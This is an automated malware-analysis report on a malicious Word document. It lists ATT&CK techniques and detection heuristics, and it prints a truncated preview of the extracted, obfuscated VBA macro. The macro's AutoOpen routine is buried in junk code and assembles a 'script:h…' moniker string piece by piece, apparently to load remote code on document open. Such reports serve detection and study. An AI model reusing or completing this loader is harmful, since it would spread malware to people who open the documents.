Verdict: MALICIOUS (Risk Score: 222)

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
- T1203 Exploitation for Client Execution
The file is identified as malicious by ClamAV and contains a VBA macro with an AutoOpen subroutine, a common technique for executing malicious code upon document opening. The presence of GetObject calls within the macro suggests an attempt to load and execute external code, likely a second-stage payload. No specific family could be identified due to obfuscation.
Heuristics (7)

- ClamAV: Doc.Malware.00536d-6923216-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Malware.00536d-6923216-0
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings): Document contains VBA macro code
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- GetObject call (high, OLE_VBA_GETOBJ): GetObject call
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 45254 bytes |

SHA-256: 7f16728fa2fe7c7b9ce374316e06619d814aa8dfe89c8018833e505d99b05262

Preview script (first 1,000 lines of the extracted script):

```vba
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub VISoqEpumiTuwusEGisi()
zOpOaiHipaq = InStr("hTIsErPOSuDo", "hTIsErPOSuDohTIsErPOSuDo")
Dim FyMEwEBywAmasUxUsIJAQera
Dim XOaaJIUbATARoxuxunoED
XOaaJIUbATARoxuxunoED = Log(6)
XOaaJIUbATARoxuxunoED = XOaaJIUbATARoxuxunoED + Log(11)
wuNAJAkELoHIt = InStr("liVaFOmhdOreaUdoBINoR", "liVaFOmhdOreaUdoBINoRliVaFOmhdOreaUdoBINoR")
FyMEwEBywAmasUxUsIJAQera = Log(7)
FyMEwEBywAmasUxUsIJAQera = FyMEwEBywAmasUxUsIJAQera + Log(12)
negymuFYTuqiVOniQO = Val("74482.10") & "maqoQiCYlibiCaGU"
End Sub
Sub AutoOpen()
On Error Resume Next
zEKEzekIgyaYgAGuGezoH = 19581
tYDEHoMyCIcyVaFuke = Val("83104.10") & "nefuKUdIBUFYRyTItMo"
pelIfUGyMYbAbomUZ = Val("57700.7") & "dESyjupeReRowuWowepAV"
Dim XOQydInaSoWyCuze
For XOQydInaSoWyCuze = 7 To 12
Dim RIjLuqUtIWUrIbIlop
RIjLuqUtIWUrIbIlop = Fix(6103)
Next
Dim SGIkolYTyMAbU
SGIkolYTyMAbU = Log(7)
SGIkolYTyMAbU = SGIkolYTyMAbU + Log(10)
Dim kEsISUlyrakADYbYbojYHiH
For kEsISUlyrakADYbYbojYHiH = 1 To 13
Dim SiNurIJIxexuDuWoVYLO
SiNurIJIxexuDuWoVYLO = Fix(52831)
Next
Dim HiPEJySqasaLUr
Debug.Print "cIsAjUhEvumel"
For HiPEJySqasaLUr = 2 To 11
ieqYniqilTiCofA = 75884
Dim NAgESAzYJoFUn
ayiYhixEqiFuZeTuDEaiJE = Val("71266.2") & "hERoBehOjiveRIPOMYLObUKI"
Dim xIvoXaJEMeBUnUfyFO
xIvoXaJEMeBUnUfyFO = Log(6)
xIvoXaJEMeBUnUfyFO = xIvoXaJEMeBUnUfyFO + Log(13)
NAgESAzYJoFUn = Fix(47842)
Next
fUsYxoqaVUwIRese = Val("62579.7") & "SehIPesalUpEiyS"
Dim CElAtaBIeZu
For CElAtaBIeZu = 2 To 12
Dim VoSYkCYrOcIDAaobI
VoSYkCYrOcIDAaobI = Fix(37334)
Next
GIitavujoTOKIKPiqEnif = ""
Dim bizygaPOVOXepUjAmoQAp
bizygaPOVOXepUjAmoQAp = Rnd(125)
If bizygaPOVOXepUjAmoQAp > 20639 Then
bizygaPOVOXepUjAmoQAp = Exp(5)
End If
Debug.Print "quxAnuSAgoNyzODuGn"
HUDewOCyvoPavOF = Val("6485.6") & "weGeqEgupOTonAzYciD"
CijezaMuMYSekyPARYJUa = InStr("vaBILYvizicedI", "vaBILYvizicedIvaBILYvizicedI")
Dim FybYCADUaYiiXeFYxUreb
For FybYCADUaYiiXeFYxUreb = 6 To 13
Dim jADyZupyjoOCY
jADyZupyjoOCY = Fix(19688)
Next
Debug.Print "fcyqJUGibuG"
Debug.Print "SePsOzYxEqIgoB"
GIitavujoTOKIKPiqEnif = GIitavujoTOKIKPiqEnif + IIf((235 + 470) = 705, "sc", "QmLC0")
Dim nIHoejIMimAhy
nIHoejIMimAhy = Log(8)
nIHoejIMimAhy = nIHoejIMimAhy + Log(13)
Dim RonufoWEFcOMuKy
RonufoWEFcOMuKy = Log(10)
RonufoWEFcOMuKy = RonufoWEFcOMuKy + Log(13)
qeWAtEmHYdYi = Val("9003.9") & "ieKeTinyauXyfIlEwIM"
LOseHWyMex = InStr("tyiASyVekADsEJUGAtiq", "tyiASyVekADsEJUGAtiqtyiASyVekADsEJUGAtiq")
GIitavujoTOKIKPiqEnif = GIitavujoTOKIKPiqEnif + IIf((149 + 298) = 447, "ri", "o")
PIjomUROladofipepyzo = Val("77980.10") & "LImHuieQC"
Dim tOJAPidOTOc
tOJAPidOTOc = Log(4)
tOJAPidOTOc = tOJAPidOTOc + Log(12)
gzAkYmAWYCYQe = 73246
Dim lFewIdikyaDEzuHAcAjai
fLyRyBAYiOTacUwUiYJa = InStr("WIBetIgYvEwETuhkAcEF", "WIBetIgYvEwETuhkAcEFWIBetIgYvEwETuhkAcEF")
buRgacigiXEfyKOqiH = 77217
For lFewIdikyaDEzuHAcAjai = 8 To 13
Dim xiTUGESIQowaUXiRYkEZy
xiTUGESIQowaUXiRYkEZy = Fix(39289)
Debug.Print "FEvYGutUBSEfUgInYbFAR"
kAZYQITuFiRiBYCuBemyWoM = Val("8066.1") & "XaLyTUNYCRyReJaqyD"
Next
GIitavujoTOKIKPiqEnif = GIitavujoTOKIKPiqEnif + IIf((170 + 340) = 510, "pt", "JfQEf")
Dim NeWPoWYvAcOhajYiOcafU
NeWPoWYvAcOhajYiOcafU = Log(8)
NeWPoWYvAcOhajYiOcafU = NeWPoWYvAcOhajYiOcafU + Log(12)
Dim mOLAqaWUiUTiWuZo
For mOLAqaWUiUTiWuZo = 8 To 12
Dim bohixozobICejAr
bohixozobICejAr = Fix(5042)
Next
NOZOZeFASOJaGuVvyGa = InStr("nYPyqoDyxIf", "nYPyqoDyxIfnYPyqoDyxIf")
GIitavujoTOKIKPiqEnif = GIitavujoTOKIKPiqEnif + IIf((193 + 386) = 579, ":h", "5t")
aatiLUiyioqupolYzoJD = 19844
qYsetIJDuiurE = 84682
Dim ZYxydotyqyMaFUQYCEzeDBY
ZYxydotyqyMaFUQYCEzeDBY = Rnd(124)
If ZYxydotyqyMaFUQYCEzeDBY > 84122 Then
ZYxydotyqyMaFUQYCEzeDBY = Exp(4)
End If
nYcEaygadizONuli
```
... (truncated)